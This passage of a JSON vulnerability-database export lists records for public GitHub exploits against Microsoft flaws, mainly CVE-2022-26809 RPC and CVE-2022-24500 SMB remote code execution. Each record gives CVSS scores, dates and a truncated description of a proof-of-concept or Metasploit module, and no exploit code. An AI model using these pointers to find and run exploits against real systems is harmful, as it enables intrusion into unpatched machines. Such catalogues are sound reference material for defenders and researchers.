"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:40:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491"], "modified": "2022-12-14T08:58:43", "id": "D2BD2CCB-A50C-50C6-B8BB-ED7CEA7D850F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:31:53", "description": "CVE-2022-24497\n=================================\n\nA Zeek detecto...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T17:12:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24497"], "modified": "2022-09-16T01:31:24", "id": "E2BC391B-CF45-5495-A025-1C766EBC0033", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T07:59:53", "description": "# CVE-2022-24500-RCE\nCVE-2022-24500 Windows SMB Remote Code Exec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-15T07:52:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-08-17T03:05:37", "id": "EF533CA5-B0FD-5588-8791-232612DF887F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:51:43", "description": "# CVE-2022-24500-RCE\nCVE-2022-24500 Windows SMB Remote Code Exec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-17T11:25:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-08-16T06:31:21", "id": "23528F1E-CDCF-55BF-BE95-F887FF5EB2A6", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T10:09:17", "description": "# CVE-2022-24500 RCE Exploit\n\n### Windows SMB Remote Code Execut...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-19T03:32:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-05-19T09:59:13", "id": "07076E26-7013-5B65-9FA9-CB53E0968E48", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:53", "description": "# CVE-2022-26809-MASS-RCE\nCVE-2022-26809 | is a remote code exec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-29T14:58:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-05-29T15:00:38", "id": "0FD9136A-3E4D-5411-B250-50BFE6958C1B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:36:27", "description": "# CVE-2022-26809 RCE\n\n## CVE description\nCVE-2022-26809 - weakne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T16:48:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-22T13:22:14", "id": "6D97B250-96C0-5F04-AB74-361E54407E64", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-08T17:57:39", "description": "# CVE-2022-26809-RCE-POC\nwriteup and poc for cve-2022-26809\n\n\nCV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T17:22:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-08T17:46:48", "id": "11042BCC-1F42-5B57-B4AE-C5167CE829D6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-27T13:11:14", "description": "# CVE-2022-26809\nA proof of concept of the CVE-2022-26809-RCE v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T11:08:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-27T12:07:44", "id": "17D73993-DDAF-58B2-9041-7D2FF7F49F48", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-21T16:46:42", "description": "# CVE-2022-26809\n\n\nWe have...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T06:51:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-08-21T15:16:49", "id": "EE079BE6-0575-5AD9-9097-B2B35F50BC5A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-26T05:03:00", "description": "# CVE-2022-26809\nThis tool is NOT free to prevent abuse. As of n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T07:12:08", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-26T03:24:36", "id": "4B9DFC33-3AD9-54F2-9409-61D1920B8A27", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-26T23:22:32", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T14:26:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-09-26T22:03:50", "id": "66FEAB51-0E93-5AFA-B90D-3B8FA04B402E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-18T07:59:48", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T20:47:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-18T05:37:37", "id": "F06CBF2F-FED2-572B-B789-BDBB772E59E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-23T23:10:16", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-15T12:06:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-09-23T19:55:04", "id": "EDC74223-EBC7-5EB3-824D-20BC92E78C05", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-19T10:18:57", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T18:40:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-05-19T08:50:46", "id": "63FE351E-F353-5ECF-A2FF-E425A0A9E6AB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-02T17:19:21", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-01T13:19:10", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-10-20T08:50:04", "id": "94F56A76-5FFA-517A-AD3C-93153FCA4D3E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-27T18:38:02", "description": "# CVE-2022-26809\nRCE Exploit within the RPC Library (CVE-2022-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T09:51:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-08-24T11:31:08", "id": "0324AD5C-F2E9-597E-A085-6035280E8508", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:50:41", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-25T08:58:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-08-06T16:25:32", "id": "7E9D2224-5410-5B9B-902F-2292B3099682", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:14:50", "description": "# CVE-2022-26809-RCE\n\nCVE-2022-26809 | is a remote code exec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T20:38:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-05-29T14:57:08", "id": "BB752603-5F3B-53D9-9580-9414AC4CDEF4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-29T19:38:57", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T04:13:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-10-29T19:29:44", "id": "706A6EEB-1D07-53EB-8455-F7809863DADC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-30T05:02:07", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 